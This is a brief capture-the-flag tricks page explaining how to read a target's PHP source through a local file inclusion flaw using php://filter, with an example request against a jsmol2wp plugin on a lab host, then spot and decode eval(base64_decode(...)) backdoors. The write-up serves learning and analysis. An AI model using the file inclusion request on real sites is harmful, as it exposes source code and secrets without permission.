> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/vulnerability-discovery/source-code-analysis/trick-0606.md).

# Backdoor Code Analysis & Decoding

***

Retrieve the source code of the target file (e.g., `hello.php`) using an LFI vulnerability, often leveraging `php://filter` to ensure raw content retrieval. Using `php://filter/convert.base64-encode/resource=index.php` allows bypassing restrictions and reading source code because the output is Base64 encoded, which prevents the server from executing it as PHP code. If the output of the filter chain is HTML-encoded, the `convert.base64-encode` filter can be used to read the content of local files.

An example request might look like this:

```
http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php
```

Analyze the retrieved code locally. Look for suspicious, encoded strings. If a Base64 encoded string is identified embedded within the code, decode it to reveal the hidden logic. A common technique to obfuscate PHP backdoors is to encode the malicious code using Base64 and then use `eval(base64_decode(...))` to execute it.

Decode the identified string using a command-line tool:

```bash
echo <base64_string_from_source_code> | base64 -d
```

This decoding step can expose hidden command injection points or backdoors embedded within the seemingly legitimate code.
